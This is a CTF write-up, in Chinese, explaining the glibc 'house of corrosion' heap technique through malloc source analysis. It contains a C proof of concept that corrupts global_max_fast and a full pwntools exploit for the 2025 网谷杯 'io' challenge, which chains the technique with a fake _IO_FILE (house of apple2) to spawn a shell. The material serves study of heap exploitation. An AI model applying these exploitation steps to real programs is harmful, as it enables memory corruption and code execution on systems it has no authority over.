0x00

网谷杯没报名上没打成,但是题目不算难,其中一道堆题用到了house of corrosion,学习一下
参考博客https://xz.aliyun.com/news/6458
https://www.anquanke.com/post/id/263622
源码分析为glibc2.35
这个手法也有针对tcache的变体,这里姑且先只分析针对fastbins的手法,后续再说(咕咕
glibc2.37 之后,global_max_fast 的类型被修改为 uint8_t(只有 1 字节),能够伪造的 global_max_fast 上限很小,使用该技巧可以控制的地址范围大大缩小。

0x01 global_max_fast 与 fastbinsY

malloc的初始化时,会设置全局变量global_max_fast的值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
Initialize a malloc_state struct.

This is called from ptmalloc_init () or from _int_new_arena ()
when creating a new arena.

Summary of what the body does: every normal bin (index 1 up to
NBINS - 1) is linked to itself, the fastbin size limit is set to
DEFAULT_MXFAST (only when AV is main_arena), have_fastchunks is
cleared, and top is set to initial_top (av).
*/

static void
malloc_init_state (mstate av)
{
int i;
mbinptr bin;

/* Establish circular links for normal bins */
for (i = 1; i < NBINS; ++i)
{
bin = bin_at (av, i);
bin->fd = bin->bk = bin;
}

/* With MORECORE_CONTIGUOUS set, only non-main arenas are marked
noncontiguous; without it the call below is unconditional. */
#if MORECORE_CONTIGUOUS
if (av != &main_arena)
#endif
set_noncontiguous (av);
/* set_max_fast is reached only while initializing main_arena, so this
function does not set the limit again for other arenas. */
if (av == &main_arena)
set_max_fast (DEFAULT_MXFAST);
atomic_store_relaxed (&av->have_fastchunks, false);

av->top = initial_top (av);
}

这个默认值是

1
2
3
#ifndef DEFAULT_MXFAST
#define DEFAULT_MXFAST (64 * SIZE_SZ / 4)
#endif

再找到malloc-size.h

1
2
3
4
5
6
#ifndef INTERNAL_SIZE_T
# define INTERNAL_SIZE_T size_t
#endif

/* The corresponding word size. */
#define SIZE_SZ (sizeof (INTERNAL_SIZE_T))

64 位下 SIZE_SZ == 8,所以默认值是 (64 * 8 / 4) == 0x80,即默认情况下 fastbins 中最大的 chunk size 为 0x80
然后我们看fastbin索引方式,在main_arena

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/* Per-arena allocator state: lock, flags, fastbin heads, top chunk,
last remainder, normal bins, bin bitmap, arena list links and memory
statistics. Members are laid out in the declaration order below. */
struct malloc_state
{
/* Serialize access. */
__libc_lock_define (, mutex);

/* Flags (formerly in max_fast). */
int flags;

/* Set if the fastbin chunks contain recently inserted free blocks. */
/* Note this is a bool but not all targets support atomics on booleans. */
int have_fastchunks;

/* Fastbins */
/* Array of NFASTBINS list heads. The members declared after this
array (top, last_remainder, bins, ...) follow it in the struct. */
mfastbinptr fastbinsY[NFASTBINS];

/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;

/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;

/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];

/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];

/* Linked list */
struct malloc_state *next;

/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;

/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;

/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};

main_arena中,管理fastbins使用fastbinsY数组,与之相关的定义如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* mfastbinptr is an alias for a pointer to struct malloc_chunk. */
typedef struct malloc_chunk *mfastbinptr;
/* Expands to element IDX of AR_PTR's fastbinsY array. The macro itself
performs no range check on IDX. */
#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])

/* offset 2 to use otherwise unindexable first 2 bins */
/* SZ is converted to unsigned int, shifted right by 4 when SIZE_SZ == 8
(by 3 otherwise), and then 2 is subtracted. */
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)


/* The maximum fastbin request size we support */
#define MAX_FAST_SIZE (80 * SIZE_SZ / 4)

/* Number of fastbins: one more than the index computed for the chunk
size of a MAX_FAST_SIZE request. */
#define NFASTBINS (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
...
/* Convert a request size to a chunk size: add SIZE_SZ, round up using
MALLOC_ALIGN_MASK, and never yield less than MINSIZE. */
#define request2size(req) \
(((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \
MINSIZE : \
((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

可以看到 64 位下 fastbin_index(size) == (size >> 4) - 2,这就是数组的下标索引方式:size 对应的 chunk 会被放入 fastbinsY[fastbin_index(size)] 这条 bin 链表
我们还是找到malloc.c中将chunk放入fastbins的部分

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
) {

if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
<= CHUNK_HDR_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))
{
bool fail = true;
/* We might not have a lock at this point and concurrent modifications
of system_mem might result in a false positive. Redo the test after
getting the lock. */
if (!have_lock)
{
__libc_lock_lock (av->mutex);
fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ
|| chunksize (chunk_at_offset (p, size)) >= av->system_mem);
__libc_lock_unlock (av->mutex);
}

if (fail)
malloc_printerr ("free(): invalid next size (fast)");
}

free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);

atomic_store_relaxed (&av->have_fastchunks, true);
unsigned int idx = fastbin_index(size);
fb = &fastbin (av, idx);

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;

if (SINGLE_THREAD_P)
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
p->fd = PROTECT_PTR (&p->fd, old);
*fb = p;
}
else
do
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
old2 = old;
p->fd = PROTECT_PTR (&p->fd, old);
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
!= old2);

/* Check that size of fastbin chunk at the top is the same as
size of the chunk that we are adding. We can dereference OLD
only if we have the lock, otherwise it might have already been
allocated again. */
if (have_lock && old != NULL
&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
malloc_printerr ("invalid fastbin entry (free)");
}

可以看到最起初判断chunksize使用了get_max_fast函数,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
/* Return the current value of global_max_fast.

The comparison against MAX_FAST_SIZE below is only an optimizer hint:
the guarded statement is __builtin_unreachable (), and no error is
reported in that branch. */
static inline INTERNAL_SIZE_T
get_max_fast (void)
{
/* Tell the GCC optimizers that global_max_fast is never larger
than MAX_FAST_SIZE. This avoids out-of-bounds array accesses in
_int_malloc after constant propagation of the size parameter.
(The code never executes because malloc preserves the
global_max_fast invariant, but the optimizers may not recognize
this.) */
if (global_max_fast > MAX_FAST_SIZE)
__builtin_unreachable ();
return global_max_fast;
}

如果global_max_fast > MAX_FAST_SIZE(在前面的定义中可以看到,MAX_FAST_SIZE(80 * SIZE_SZ / 4) == 0xa0)就会进入__builtin_unreachable ();,这是个什么东西?
__builtin_unreachable() 是一个非常重要且强大的编译器内置函数,主要用于性能优化。它存在于 GCC 和 Clang 等主流 C/C++ 编译器中。简单来说,它的核心行为是告诉编译器,程序执行流程绝对、永远不可能到达这个点。如果程序在运行时真的执行到了 __builtin_unreachable(),其行为是“未定义行为” (Undefined Behavior, UB)
这里我们先放着,后续再说
往下看,最关键的部分

1
2
3
4
5
6
7
...
unsigned int idx = fastbin_index(size);
fb = &fastbin (av, idx);

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;
...

这是先按照索引方式,取到在fastbinsY中的索引,然后再取到fastbinsY数组中对应项的地址(指向对应bin单链表头结点的指针)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
...
if (SINGLE_THREAD_P)
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
p->fd = PROTECT_PTR (&p->fd, old);
*fb = p;
}
else
do
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
old2 = old;
p->fd = PROTECT_PTR (&p->fd, old);
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
!= old2);
...

然后,如果SINGLE_THREAD_P(单线程环境),则直接头插法插入;如果是多线程环境,则使用原子操作 compare_and_exchange 来安全插入(搬运自gpt)总之就是插入
我们于是能注意到,这里对于fastbinsY数组的索引并没有检查,如果我们能让一个size大的chunk进入这个分支,则fastbin_index的计算就会溢出fastbinsY数组的范围,那么后续的操作也就会导致越界读写

0x02 攻击手法

越界写入时的示意图如下,我们申请对应size(注意是size域为对应值而非malloc(size))的chunkA,修改global_max_fast,然后free这个chunkA,此时就向目标地址写入了一个堆地址

接着我们修改A->fd (此处仅仅示意,需要注意safe-linking)

那么我们再次将chunkA申请回来,就实现了写入

那么这里size如何得知呢?根据fastbin_index == (size >> 4) - 2,并且fastbinsY数组每一项为0x8,我们计算

1
2
3
4
offset = target_addr - fastbinY_addr
idx = offset / 0x8
(size >> 4) - 2 == idx --> size == ((offset + 0x10) / 0x8) << 4 == ((offset + 0x10) / 0x8) * 0x10
== offset*2 + 0x20

所以我们需要的chunksize域为offset*2 + 0x20
至于偏移

1
2
pwndbg> p &main_arena.fastbinsY
$1 = (mfastbinptr (*)[10]) 0x7ffff7e1ac90 <main_arena+16>

由于 target 与 fastbinsY 都位于 libc 内,二者之间的相对偏移是固定值,因此计算 size 时无需泄露 libc_base 也能得出
PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#include <stdio.h>
#include <stdlib.h>

/*
 * House of Corrosion proof of concept.
 *
 * All libc offsets below are hard-coded for one specific libc build (the
 * accompanying note says glibc 2.35); on any other build the addresses are
 * wrong and the program will corrupt unrelated memory.
 *
 * Steps:
 *   1. Derive libc_base from the address of puts, then the addresses of
 *      global_max_fast, _IO_list_all and main_arena.fastbinsY.
 *   2. Compute the chunk size whose fastbin index lands on _IO_list_all
 *      (size = offset * 2 + 0x20) and allocate a chunk of that size.
 *   3. Overwrite global_max_fast with a huge value and free the chunk, so
 *      free() stores the chunk address at _IO_list_all.
 *   4. Rewrite the freed chunk's fd (deliberate use-after-free) and
 *      allocate again, so the decoded fd value is stored at _IO_list_all.
 *
 * Returns 0 on completion, 1 if an allocation fails.
 */
int main(void)
{
    puts("Poc");

    /* Convert the function pointer to an integer before subtracting:
       arithmetic on a function pointer is not valid ISO C. */
    size_t libc_base = (size_t)&puts - 0x80e50;
    size_t global_max_fast_addr = libc_base + 0x221500;
    size_t _IO_list_all = libc_base + 0x21b680;
    size_t fastbinsY_addr = libc_base + 0x21ac90;
    /* fastbinsY entries are 8 bytes and index = (size >> 4) - 2. */
    size_t size = (_IO_list_all - fastbinsY_addr) * 2 + 0x20;

    printf("libc_base: %p\n", (void *)libc_base);
    printf("my_global_max_fast: %p\n", (void *)global_max_fast_addr);
    printf("_IO_list_all: %p\n", (void *)_IO_list_all);
    printf("fastbinsY: %p\n", (void *)fastbinsY_addr);
    printf("size: %zx\n", size);
    printf("_IO_list_all: %zx\n", *(size_t *)_IO_list_all);

    void *p1 = malloc(size - 0x10);
    /* NOTE(review): presumably a guard chunk that keeps p1 from bordering
       the top chunk; it is never used afterwards. */
    void *p2 = malloc(0x60);
    if (p1 == NULL || p2 == NULL) {
        puts("malloc failed");
        return 1;
    }

    /* Raise the fastbin size limit so that free(p1) takes the fastbin path. */
    *((size_t *)global_max_fast_addr) = 0x7fffffffffffffff;
    free(p1);

    /* Deliberate write-after-free: store 0xdeadbeef as the safe-linking
       encoded fd, i.e. XORed with the chunk address shifted right by 12. */
    ((size_t *)p1)[0] = ((size_t)p1 >> 12) ^ 0xdeadbeef;

    /* Taking the chunk back makes malloc store the decoded fd in the bin head. */
    (void)malloc(size - 0x10);

    /* %zx matches the size_t argument; the original used %llx here. */
    printf("_IO_list_all: %zx\n", *(size_t *)_IO_list_all);

    return 0;
}
// glibc2.35
//gcc pwn.c -o pwn -g

我们调试一下,起初

1
2
pwndbg> p/x global_max_fast
$1 = 0x80

然后我们修改其为一个很大的值,再free(p1)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x555555559290
Size: 0x410 (with flag bits: 0x411)

Allocated chunk | PREV_INUSE
Addr: 0x5555555596a0
Size: 0x1400 (with flag bits: 0x1401)

Allocated chunk | PREV_INUSE
Addr: 0x55555555aaa0
Size: 0x70 (with flag bits: 0x71)

Top chunk | PREV_INUSE
Addr: 0x55555555ab10
Size: 0x1f4f0 (with flag bits: 0x1f4f1)

pwndbg> p _IO_list_all
$3 = 140737352152704
pwndbg> p/x _IO_list_all
$4 = 0x7ffff7e1b680
pwndbg> x/gx 0x7ffff7e1b680
0x7ffff7e1b680 <_IO_list_all>: 0x00005555555596a0

可以看到目标地址_IO_list_all已经指向了一个堆地址(因为我们破坏了global_max_fast所以这里关于heap的调试有点异常)
一般来说如果我们进行IO攻击的话,这里就已经达成目的了:向_IO_list_all写入了一个堆地址(并且是 chunk 头地址,而非用户数据地址),我们可以在这个p1中伪造数据来打一些house(当然需要uaf)
后续几步就是写一个值进target,任意地址写任意值的效果,注意这里fastbin在当下版本是存在safe-linking保护的,见此前博客
最后看一下效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 ── r3t2@LAPTOP-6JKPOVPE:~/ctf/pwn_demos/corr
│ 22:58:03
── $ ./pwn
Poc
libc_base: 0x701432800000
my_global_max_fast: 0x701432a21500
_IO_list_all: 0x701432a1b680
fastbinsY: 0x701432a1ac90
size: 1400
_IO_list_all: 701432a1b6a0
_IO_list_all: deadbeef
Segmentation fault (core dumped)

► 0x7ffff7c8ea66 <_IO_flush_all_lockp+390> mov eax, dword ptr [r15 + 0xc0] <Cannot dereference [0xdeadbfaf]>

因为我们随便写入了0xdeadbeef,程序退出执行_IO_cleanup自然会崩溃
值得一提的是,这里我们修改global_max_fast为一较大值,get_max_fast函数并没有导致程序崩溃,推测是此前__builtin_unreachable ();的行为使得编译器优化了这一判断
另外,与上面写的原理类似,fastbinsY数组越界后,根据头插法来插入chunk,那么越界到达处原有的值会被写入 chunk 的 fd 域,借此可以读出libc地址;然而,在safe-linking引入后,写入 fd 的是经过 PROTECT_PTR 处理的值,这并不实用,不再赘述

0x03 网谷杯2025 io

菜单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/* Decompiled entry point of the challenge binary.
   Disables buffering on stdout, stderr and stdin, then loops forever:
   print the menu, read a number, and dispatch 1 -> add, 2 -> edit,
   3 -> delete, 4 -> exit(0). Any other value just repeats the loop. */
void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
int v3; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v4; // [rsp+8h] [rbp-8h]

v4 = __readfsqword(0x28u);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
setbuf(stdin, 0LL);
while ( 1 )
{
menu();
// The return value of scanf is not checked.
__isoc99_scanf("%u", &v3);
switch ( v3 )
{
case 1:
add();
break;
case 2:
edit();
break;
case 3:
delete();
break;
case 4:
// The only way out of the loop is through exit().
exit(0);
}
}
}

看各个选项

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/* Decompiled "add" menu handler.
   Reads a length, accepts it only when 0x90 < size <= 0x1666, allocates
   that many bytes, stores the pointer in the first empty slot of
   chunk_list (indices 0..4), reads up to size bytes into it and echoes
   the buffer with puts. If all five slots are taken the new buffer is
   freed again. */
unsigned __int64 add()
{
unsigned int size; // [rsp+8h] [rbp-18h] BYREF
int idx; // [rsp+Ch] [rbp-14h]
void *buf; // [rsp+10h] [rbp-10h]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]

v4 = __readfsqword(0x28u);
puts("Content length:");
__isoc99_scanf("%u", &size);
if ( size <= 0x90 || size > 0x1666 )
{
puts("Invalid size");
}
else
{
// Allocation happens before a free slot is looked up; the buffer is
// not cleared and the malloc result is not checked.
buf = malloc(size);
for ( idx = 0; idx <= 4; ++idx )
{
if ( !chunk_list[idx] )
{
chunk_list[idx] = buf;
puts("Please input your data:");
// read() appends no terminator, so the puts below prints up to the
// first zero byte, which may lie beyond the bytes just written.
read(0, buf, size);
puts("Your data:");
puts((const char *)buf);
puts("Done!");
break;
}
}
// idx reaches 5 only when the loop finished without finding a slot.
if ( idx == 5 )
{
free(buf);
puts("Too many chunks!");
}
}
// NOTE(review): presumably the decompiler's rendering of the stack-cookie check.
return __readfsqword(0x28u) ^ v4;
}

add 可以输入数据且有输出,且 size 范围较大,可以用来 leak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/* Decompiled "edit" menu handler.
   Reads up to 0x28 bytes into a local array of six qwords, copies
   buf[0], buf[2], buf[3] and buf[4] into globals (buf[0] twice, buf[1]
   not at all), then stores the constant 0xDEADBEEFCAFEBABE at the
   address held in buf[0]. No heap chunk content is edited. */
unsigned __int64 edit()
{
_QWORD buf[6]; // [rsp+8h] [rbp-38h] BYREF
unsigned __int64 v2; // [rsp+38h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("As if nothing can be done, but it seems useful?");
// 0x28 bytes fill buf[0]..buf[4]; buf[5] is never written by this read.
read(0, buf, 0x28uLL);
qword_202100 = buf[0];
qword_202108 = buf[2];
qword_202110 = buf[3];
qword_202118 = buf[4];
qword_202120 = buf[0];
// buf[0] is used as a pointer without any validation: a fixed 8-byte
// value is written to a caller-chosen address.
*(_QWORD *)buf[0] = 0xDEADBEEFCAFEBABELL;
// NOTE(review): presumably the decompiler's rendering of the stack-cookie check.
return __readfsqword(0x28u) ^ v2;
}

并不能编辑,但是可以任意地址写一个大数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/* Decompiled "delete" menu handler.
   Reads an index; when it is at most 4 and the slot is non-empty, the
   chunk is freed and the slot is reset to 0, so the stale pointer is
   not kept in chunk_list. Otherwise "Invalid id" is printed. */
unsigned __int64 delete()
{
unsigned int idx; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("Content id:");
__isoc99_scanf("%u", &idx);
// idx is unsigned, so the single upper-bound comparison covers the range.
if ( idx <= 4 && chunk_list[idx] )
{
free((void *)chunk_list[idx]);
// Slot cleared right after free.
chunk_list[idx] = 0LL;
puts("Delete is done!");
}
else
{
puts("Invalid id");
}
// NOTE(review): presumably the decompiler's rendering of the stack-cookie check.
return __readfsqword(0x28u) ^ v2;
}

delete ,无 uaf
exit,直接打house of corrosion + house of apple2,exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.9/amd64/libc6_2.31-0ubuntu9.9_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 1337
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b *$rebase(0x93A)
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.9/amd64/libc6-dbg_2.31-0ubuntu9.9_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.9/amd64/glibc-source_2.31-0ubuntu9.9_all/usr/src/glibc/glibc-2.31
'''

def start():
    """Create the tube used to talk to the target.

    With the P argument a local process is spawned, with R a connection to
    host:port is opened, and otherwise the binary is started under gdb
    using the commands in gs.
    """
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
menu = b'exit'

def add(size, data = b'deadbeef'):
    """Drive menu option 1: request a chunk of `size` bytes and send `data`.

    size -- integer content length, sent as a decimal line.
    data -- bytes written into the new chunk (no newline is appended).
    """
    io.recvuntil(menu)
    io.sendline(b'1')
    io.recvuntil(b'length:')
    # Tubes carry bytes; encode explicitly instead of passing a str.
    io.sendline(str(size).encode())
    io.recvuntil(b'data:')
    io.send(data)

def free(idx):
    """Drive menu option 3: delete the chunk stored at slot `idx`.

    idx -- integer slot number, sent as a decimal line.
    """
    io.recvuntil(menu)
    io.sendline(b'3')
    io.recvuntil(b'id:')
    # Tubes carry bytes; encode explicitly instead of passing a str.
    io.sendline(str(idx).encode())

def edit(data):
    """Drive menu option 2 and send `data` (bytes) once the prompt's '?' arrives."""
    io.sendlineafter(menu, b'2')
    io.sendafter(b'?', data)

def ex():
    """Drive menu option 4, which makes the target call exit(0)."""
    io.sendlineafter(menu, b'4')

# Stage 1: libc leak. Free slot 0, take it back with the 8-byte default
# payload, and read the 6 bytes the target echoes right after it.
add(0x500) #0
add(0x500) #1
free(0) #0 -> unsortedbin
add(0x500) #0
io.recvuntil(b'deadbeef')
# NOTE(review): 96 and 0x1ecb80 are presumably the main_arena+96 bin
# address and the main_arena offset for this exact libc build - confirm.
libc_base = u64(io.recv(6).ljust(0x8, b'\x00')) - 96 - 0x1ecb80
log.info("libc_base --> "+hex(libc_base))

# Stage 2: heap leak. Same idea with a 0x10-byte payload, reading the
# 6 bytes that follow it.
free(0)
add(0x600) #0 previous 0 -> largebin
add(0x500, b'a'*0x10) #2 previous 0
io.recvuntil(b'a'*0x10)
# NOTE(review): 0x290 is presumably the offset of the leaked chunk from the heap start.
heap_base = u64(io.recv(6).ljust(0x8, b'\x00')) - 0x290
log.info("heap_base --> "+hex(heap_base))

# Stage 3: compute the chunk size whose fastbin slot is _IO_list_all.
# Both hard-coded offsets are specific to this libc build.
global_max_fast = libc_base + 0x1eeea0
fastbinsY = libc_base + 0x1ecb80 + 0x10
offset = libc_base + libc.sym['_IO_list_all'] - fastbinsY
size = offset*2 + 0x20
log.info("size --> "+hex(size))

# Address of the chunk that will hold the fake FILE, derived from the
# sizes of the chunks allocated so far plus the 0x508 request below.
chunk_addr = heap_base + 0x290 + 0x510*2 + 0x610 + 0x510
log.info("fake_io addr --> "+hex(chunk_addr))
io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
system = libc_base + libc.sym['system']

# The payload starts 0x10 bytes into the chunk, hence every "- 0x10" below:
# the offsets are written relative to chunk_addr.
fake_IO_file = p64(0) * 2 + p64(1) + p64(2)
fake_IO_file = fake_IO_file.ljust(0xa0 - 0x10, b'\x00') + p64(chunk_addr + 0x100) #wide_data
fake_IO_file = fake_IO_file.ljust(0xc0 - 0x10, b'\x00') + p64(0xffffffffffffffff) #mode
fake_IO_file = fake_IO_file.ljust(0xd8 - 0x10, b'\x00') + p64(io_wfile_jumps) #vtable
fake_IO_file = fake_IO_file.ljust(0x100 - 0x10 + 0xe0, b'\x00') + p64(chunk_addr + 0x200) #_wide_data->_wide_vtable
fake_IO_file = fake_IO_file.ljust(0x200 - 0x10 + 0x68, b'\x00') + p64(system) # _wide_data->_wide_vtable->doallocate

# Stage 4: place the fake FILE, then re-take slot 3 so that the last
# 8 bytes of its data set the first 8 bytes at chunk_addr.
add(0x508) #3
add(size - 0x10, fake_IO_file) #4
free(3)
add(0x508, b'a'*0x500 + p32(0xfbadf7f5) + b';sh\x00') #3 to edit fake_io -> _flags
# Menu option 2 writes its fixed large constant to the address sent here.
edit(p64(global_max_fast))
free(4) #io_list_all -> fake_io

# Stage 5: menu option 4 calls exit(0).
ex()

io.interactive()

效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[*] Switching to interactive mode

[DEBUG] Received 0x17 bytes:
00000000 73 68 3a 20 31 3a 20 f5 f7 ad fb 3a 20 6e 6f 74 │sh: │1: ·│···:│ not│
00000010 20 66 6f 75 6e 64 0a │ fou│nd·│
00000017
sh: 1: \xf5\xf7\xad\xfb: not found
$ whoami
[DEBUG] Sent 0x7 bytes:
b'whoami\n'
[DEBUG] Received 0x5 bytes:
b'r3t2\n'
r3t2
$